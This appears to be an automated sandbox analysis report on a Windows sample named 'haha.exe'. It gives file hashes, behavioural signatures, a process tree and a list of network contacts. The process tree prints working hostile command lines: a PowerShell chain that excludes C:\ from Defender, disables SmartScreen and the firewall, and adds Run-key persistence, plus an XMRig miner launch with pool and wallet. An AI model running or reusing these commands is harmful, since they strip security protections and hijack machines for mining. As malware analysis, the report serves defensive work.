SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/213592-87-0x0000000000000000-mapping.dmp

\ProgramData\Systemd\procexp.exe

MD5 2d9fb9ed8bebb55280b81a4652dcfa11
SHA1 76300e059e74d8cfc99a736917cd3a512dd32cab
SHA256 573fc41ae5b597cbb3e2255224013aa861d23b6608b2efef20685ff393e6b8bf
SHA512 ae984a21cbf9c556407ad8ee60c07342884d5905cd0e9aece195ed44cca82d434b24da931be346e1cecea8fca856af6dd3dcd2994f95f5895647fe029650ce9c

memory/213592-89-0x0000000000070000-0x0000000000090000-memory.dmp

C:\ProgramData\Systemd\procexp.exe

MD5 2d9fb9ed8bebb55280b81a4652dcfa11
SHA1 76300e059e74d8cfc99a736917cd3a512dd32cab
SHA256 573fc41ae5b597cbb3e2255224013aa861d23b6608b2efef20685ff393e6b8bf
SHA512 ae984a21cbf9c556407ad8ee60c07342884d5905cd0e9aece195ed44cca82d434b24da931be346e1cecea8fca856af6dd3dcd2994f95f5895647fe029650ce9c

memory/213592-90-0x0000000000000000-0x0000000001000000-memory.dmp

memory/213512-85-0x000007FEF3590000-0x000007FEF3FB3000-memory.dmp

memory/213512-92-0x0000000002384000-0x0000000002387000-memory.dmp

memory/213512-91-0x000007FEF2970000-0x000007FEF34CD000-memory.dmp

memory/213592-94-0x0000000000000000-0x0000000001000000-memory.dmp

memory/213440-111-0x0000000000454CB9-mapping.dmp

memory/1208-115-0x0000000000400000-0x00000000005C5000-memory.dmp

memory/213512-117-0x0000000002384000-0x0000000002387000-memory.dmp

memory/213440-114-0x0000000000400000-0x000000000048E000-memory.dmp

memory/213440-131-0x0000000000400000-0x000000000048E000-memory.dmp

memory/213512-93-0x000000001B7A0000-0x000000001BA9F000-memory.dmp

memory/213972-157-0x0000000000000000-mapping.dmp

C:\ProgramData\UpSys.exe

MD5 efe5769e37ba37cf4607cb9918639932
SHA1 f24ca204af2237a714e8b41d54043da7bbe5393b
SHA256 5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA512 33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

C:\ProgramData\UpSys.exe

MD5 efe5769e37ba37cf4607cb9918639932
SHA1 f24ca204af2237a714e8b41d54043da7bbe5393b
SHA256 5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA512 33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

memory/213512-160-0x000000000238B000-0x00000000023AA000-memory.dmp

\ProgramData\UpSys.exe

MD5 efe5769e37ba37cf4607cb9918639932
SHA1 f24ca204af2237a714e8b41d54043da7bbe5393b
SHA256 5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA512 33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

memory/214008-163-0x0000000000000000-mapping.dmp

memory/213512-166-0x0000000002384000-0x0000000002387000-memory.dmp

memory/213512-167-0x000000000238B000-0x00000000023AA000-memory.dmp

C:\ProgramData\UpSys.exe

MD5 efe5769e37ba37cf4607cb9918639932
SHA1 f24ca204af2237a714e8b41d54043da7bbe5393b
SHA256 5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA512 33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

C:\ProgramData\UpSys.exe

MD5 efe5769e37ba37cf4607cb9918639932
SHA1 f24ca204af2237a714e8b41d54043da7bbe5393b
SHA256 5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2
SHA512 33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

memory/2040-172-0x0000000000000000-mapping.dmp

memory/2040-174-0x000007FEF2D30000-0x000007FEF3753000-memory.dmp

memory/2040-176-0x000007FEEEBF0000-0x000007FEEF74D000-memory.dmp

memory/2040-177-0x0000000002414000-0x0000000002417000-memory.dmp

memory/2040-178-0x000000000241B000-0x000000000243A000-memory.dmp

C:\Windows\Logs\CBS\CbsPersist_20220707080516.cab

MD5 a32bd4bba702ab65887cc2819c0770f7
SHA1 aa978c40cb493b6216b74d860785051782cdb7fb
SHA256 45681c21b74225ca0e816bed870e3ddb81fc3ecbaaa4af964810321109309c4f
SHA512 a7a21033b068679172019b2964cf133647120259ca6e21c915cfbc159316bf92a588aa19e73b804601e64e97f8e065e4ae1b56d51c46b53fbbc3e5e11e10e0e2

C:\Windows\Logs\CBS\CbsPersist_20220707080516.log

MD5 65cc66bc672dfe15e3f6cd35686ccb9c
SHA1 8f64ff9c931a9a92534639fddd15f4c67936438c
SHA256 6f83c8ddccc53d8788a808fcbcf500001ffc2ee9e0be71ec01a32fed536338dd
SHA512 73b106db474ccf13557ae3a8a8351e8605b0d6f04ea1dfd66033d24aea263f9bf57e89aa5d751acb25ac622e4c4e52443d4b72fff2055810fb06f93657abf8fe

Analysis: behavioral2

Detonation Overview

Submitted

2022-07-07 08:03

Reported

2022-07-07 08:14

Platform

win10v2004-20220414-en

Max time kernel

608s

Max time network

603s

Command Line

"C:\Users\Admin\AppData\Local\Temp\haha.exe"

Signatures

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 92304 created 67976 N/A C:\Windows\system32\svchost.exe C:\ProgramData\UpSys.exe
PID 92304 created 94360 N/A C:\Windows\system32\svchost.exe C:\ProgramData\UpSys.exe

xmrig

miner xmrig

XMRig Miner Payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\haha.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\ProgramData\UpSys.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\ProgramData\UpSys.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\ProgramData\UpSys.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\ProgramData\UpSys.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\ProgramData\UpSys.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\ProgramData\UpSys.exe N/A
N/A N/A C:\ProgramData\UpSys.exe N/A
N/A N/A C:\ProgramData\UpSys.exe N/A
N/A N/A C:\ProgramData\UpSys.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\ProgramData\UpSys.exe N/A
N/A N/A C:\ProgramData\UpSys.exe N/A
N/A N/A C:\ProgramData\UpSys.exe N/A
N/A N/A C:\ProgramData\UpSys.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\Systemd\procexp.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\UpSys.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\ProgramData\UpSys.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\Systemd\procexp.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\ProgramData\UpSys.exe N/A
Token: 0 N/A C:\ProgramData\UpSys.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\UpSys.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\ProgramData\UpSys.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\ProgramData\UpSys.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\ProgramData\Systemd\procexp.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2136 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\haha.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\haha.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2136 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\haha.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1172 wrote to memory of 2284 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\79571.exe
PID 1172 wrote to memory of 2284 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\79571.exe
PID 1172 wrote to memory of 2284 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\79571.exe
PID 2284 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\79571.exe C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe
PID 2284 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\79571.exe C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe
PID 2284 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\79571.exe C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe
PID 2284 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\79571.exe C:\Users\Admin\AppData\Local\Temp\DllHost.exe
PID 2284 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\79571.exe C:\Users\Admin\AppData\Local\Temp\DllHost.exe
PID 1444 wrote to memory of 33560 N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1444 wrote to memory of 33560 N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 33560 wrote to memory of 67976 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\UpSys.exe
PID 33560 wrote to memory of 67976 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\UpSys.exe
PID 1444 wrote to memory of 69608 N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe C:\ProgramData\Systemd\procexp.exe
PID 1444 wrote to memory of 69608 N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe C:\ProgramData\Systemd\procexp.exe
PID 33560 wrote to memory of 85036 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\netsh.exe
PID 33560 wrote to memory of 85036 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\netsh.exe
PID 92304 wrote to memory of 94360 N/A C:\Windows\system32\svchost.exe C:\ProgramData\UpSys.exe
PID 92304 wrote to memory of 94360 N/A C:\Windows\system32\svchost.exe C:\ProgramData\UpSys.exe
PID 92304 wrote to memory of 94992 N/A C:\Windows\system32\svchost.exe C:\ProgramData\UpSys.exe
PID 92304 wrote to memory of 94992 N/A C:\Windows\system32\svchost.exe C:\ProgramData\UpSys.exe
PID 94992 wrote to memory of 94460 N/A C:\ProgramData\UpSys.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 94992 wrote to memory of 94460 N/A C:\ProgramData\UpSys.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\haha.exe

"C:\Users\Admin\AppData\Local\Temp\haha.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -F C:\Users\Admin\AppData\Local\Temp\79571.ps1

C:\Users\Admin\AppData\Local\Temp\79571.exe

"C:\Users\Admin\AppData\Local\Temp\79571.exe"

C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe

"C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe"

C:\Users\Admin\AppData\Local\Temp\DllHost.exe

"C:\Users\Admin\AppData\Local\Temp\DllHost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)

C:\ProgramData\UpSys.exe

"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe

C:\ProgramData\Systemd\procexp.exe

--url pool.hashvault.pro:80 --user 42kFTbPkrpEY8KRSdRjzLpawdNvmR1BTKPRfaaGoq9TcDNhnKapy9G99eH9AsJon766YDYnKEobxycNSDuHbPG3JHV5zKut --pass x

C:\Windows\system32\netsh.exe

"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon

C:\ProgramData\UpSys.exe

"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe

C:\ProgramData\UpSys.exe

"C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

Network

Country Destination Domain Proto
US 20.189.173.2:443 tcp
NL 104.110.191.133:80 tcp
NL 104.110.191.133:80 tcp
NL 104.110.191.133:80 tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
N/A 127.0.0.1:49754 tcp
N/A 127.0.0.1:49759 tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 api.ipify.org udp
US 3.220.57.224:443 api.ipify.org tcp
US 8.8.8.8:53 crl.usertrust.com udp
US 104.18.32.68:80 crl.usertrust.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 13.107.21.200:443 tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 142.132.131.248:80 pool.hashvault.pro tcp

Files

